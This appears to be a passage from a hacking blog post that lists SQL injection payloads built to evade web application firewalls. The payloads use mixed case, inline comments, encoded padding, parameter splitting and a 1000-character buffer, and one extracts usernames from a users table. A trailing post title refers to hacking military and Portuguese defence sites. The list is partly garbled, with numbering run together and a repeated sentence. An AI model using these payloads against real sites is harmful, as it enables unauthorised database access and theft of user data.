id=1+UNIunionON+SELselectECT 1,2,3—
9.
id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10.
id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—11.id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—12.id=1+un/**/ion+sel/**/ect+1,2,3--13.id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,314.id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15.
id=1+/**/union/*&id=*/select/*&id=*/1,2,3--
It’s only important to use these queries as weird as they look right now at the start of the query, meaning, the rest of the query you could try normal like:
www.example.com/page.php?id=1
id=1+(UnIoN)+(SelECT)+1,2,username,4,5 from users--
The unknown 500 server error bypass.
A lot of you might not know that 500 server errors fall under WAF bypassing, it’s simply a technique used, we will use a certain amount of characters to bypass the filters.
A lot of you might not know that 500 server errors fall under WAF bypassing, it’s simply a technique used, we will use a certain amount of characters to bypass the filters.
Example:
index.php?id=-1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!UNION*/ /*!SELECT*//**/1,2,3,4,5,6—x
n The query looks quite big, the A = 1000x, to bypass common filters
Subscribe to:
Posts (Atom)
Hack mil elsa GET REQUEST special character defesa.pt
https://example.com/api/data?query=hello%20world https://example.com/api/data?search=rock%26roll%3Dawesome%23fun https://intranet.marinha....
